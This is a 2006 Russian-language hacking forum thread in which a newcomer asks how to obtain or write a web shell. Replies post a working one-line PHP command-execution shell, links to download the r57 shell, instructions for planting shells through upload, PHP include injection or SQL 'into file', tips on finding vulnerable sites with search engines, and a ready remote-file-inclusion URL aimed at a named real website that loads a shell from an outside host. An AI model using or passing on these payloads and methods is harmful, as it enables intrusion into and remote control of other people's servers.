Помогите

Discussion in 'PHP' started by A.R.S., 17 Apr 2006.

  1. A.R.S.

    A.R.S. New Member

    Joined:
    17 Apr 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте
    Помогите мне пожалуйста и расскажите как и откуда берутся шелы.
    заранее спасибо
     
  2. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Шеллы с небес бог посылает или добрые люди на форуме выкладывают, либо ты сам баги ищеш shell туды заливаешь.Еще как вариан с помощью дяденьки google можно поискать.
     
  3. A.R.S.

    A.R.S. New Member

    Joined:
    17 Apr 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    не ну правда как создать свой шелл и что для этого нужно
     
  4. Sw%00p

    Sw%00p Banned

    Joined:
    13 Apr 2006
    Messages:
    47
    Likes Received:
    8
    Reputations:
    8
    опять я за совё пхп и перловка
    ну мона асп ну короче на всём хоть на бейсике
     
  5. H0ak1N

    H0ak1N Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    25
    Likes Received:
    7
    Reputations:
    1
    скачай в инете чей-нибудь троян-бэкдор, запусти и будет у кого-то шелл :D

    а вообще надо поиском пользоваться.
    читай тут например http://forum.antichat.ru/showpost.php?p=136113&postcount=9
    они разные бывают, иногда слово "шелл" носит в себе нарицательный характер в разговорной форме. Например: "сделал шелл" т.е на захваченном компе установил backdoor по которому можно удалённо пользоваться системой вне поле зрения владельца :)
     
    #5 H0ak1N, 18 Apr 2006
    Last edited: 18 Apr 2006
  6. A110ut

    A110ut Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    505
    Likes Received:
    263
    Reputations:
    92
    <?php if(@$c)system($c);?>
    держи. потренируйся.. авось получим аналог r57 =)
     
    2 people like this.
  7. Sw%00p

    Sw%00p Banned

    Joined:
    13 Apr 2006
    Messages:
    47
    Likes Received:
    8
    Reputations:
    8
    хошь я те свой шелл пришли правда на стадии разработок но пашет мощьно

    не уступает самому р57
     
  8. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    1. шелл создавать не нужно, уже есть готовые:
    а) http://rst.void.ru/download/r57shell.txt
    б) http://nst.void.ru/?q=releases&download=6
    etc...
    вот статья про шеллы и что это вообще такое:
    http://optics.org.ua/Aboutshell.rar

    2. Чтобы использовать шелл, нужно чтобы его код исполнился на уязвимой системе... Этого можно достичь обычно двумя способами:
    а) залить его каким либо способом (ftp или через веб) и открыть в браузере =)
    б) ипользовать уязвимости в коде: php injection (обычно банальный include() ), либо sql injection (обычно into file), где шелл заливать не нужно, его код берётся из вне

    3. Чтобы найти уязвимые скрипты, нужно:
    а) пользоваться ПОИСКОМ и смотреть сайты в моей подписи
    б) использовать google, со специальными запросами (ищи и всё найдёшь! ;) )
    в) щупать самому :)

    p.s.

    пример php injection - _http://www.the-loan-center.net/sphider/admin/configset.php?settings_dir=http://rst.void.ru/download/r57shell.txt?

    p.p.s

    могу писать бред, т.к. нахожусь в "неадекватном" состоянии :p
     
  9. A110ut

    A110ut Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    505
    Likes Received:
    263
    Reputations:
    92
    меня терзают смутные сомнения...
     
  10. Sw%00p

    Sw%00p Banned

    Joined:
    13 Apr 2006
    Messages:
    47
    Likes Received:
    8
    Reputations:
    8
    да я тя понял скажешь что я у них всё переписал

    есть пословица

    до чего додумался один человек додумается и второй

    и порой пхп не р57 создал
     
  11. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    мля, задолбали флудить!
    для всех вопросов и обсуждений не по теме есть: мыло, личка, ася etc...
    считаю что этот и предыдущие 2 поста могут быть удалены...